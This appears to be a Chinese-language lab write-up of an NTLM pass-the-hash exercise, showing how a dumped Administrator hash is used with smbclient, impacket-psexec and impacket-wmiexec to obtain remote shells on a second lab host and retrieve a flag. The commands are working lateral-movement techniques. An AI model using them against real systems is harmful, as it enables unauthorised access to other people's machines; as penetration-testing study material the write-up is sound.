NTLM PtH

 NTLM PtH


已知靶機 192.168.197.211,帳號 / 密碼 : gunther / password123!

透過 PTH 技術登入到靶機 192.168.197.212

並在 Administrator 桌面上找到 Flag 



第一步先用已知的帳號密碼登入 192.168.197.211

登入後輸入 \\192.168.197.212\secrets,會跳出如下的帳號密碼驗證視窗

使用 gunther 與密碼 password123! 無法登入,所以看來第二台沒有該帳號權限




先抓取現有登入機器的 administrator 帳號 HASH 如下 7a38310ea6f0027ee955abed1762964b




從攻擊機直接透過 smbclient 指令,並指定使用者 administrator 然後密碼用 HASH 登入測試

└─$ smbclient \\\\192.168.197.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

可以看到成功登入了



接下來使用 impacket 庫中的 psexec.py 腳本來拿 remote shell

由於 HASH 的格式為 "LMHash:NTHash" (LM 在現今系統已無使用,但還是要輸入不可空白)

使用如下指令登入,記得 LM Hash 要輸入一樣的長度,直接用 0 代替即可

└─$ impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.197.212

直接就拿到 remote shell 了,ipconfig 看一下確定是 192.168.197.212 那一台





直接到管理員桌面拿 flag 吧





因為 impacket 當中包含了許多指令與套件,我們可以使用另外一個 wmiexec 也可以成功拿到 remote shell,指令 └─$ impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.197.212

如下圖可以看到一樣拿到 shell,ipconfig 看一下確認是 192.168.197.212




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)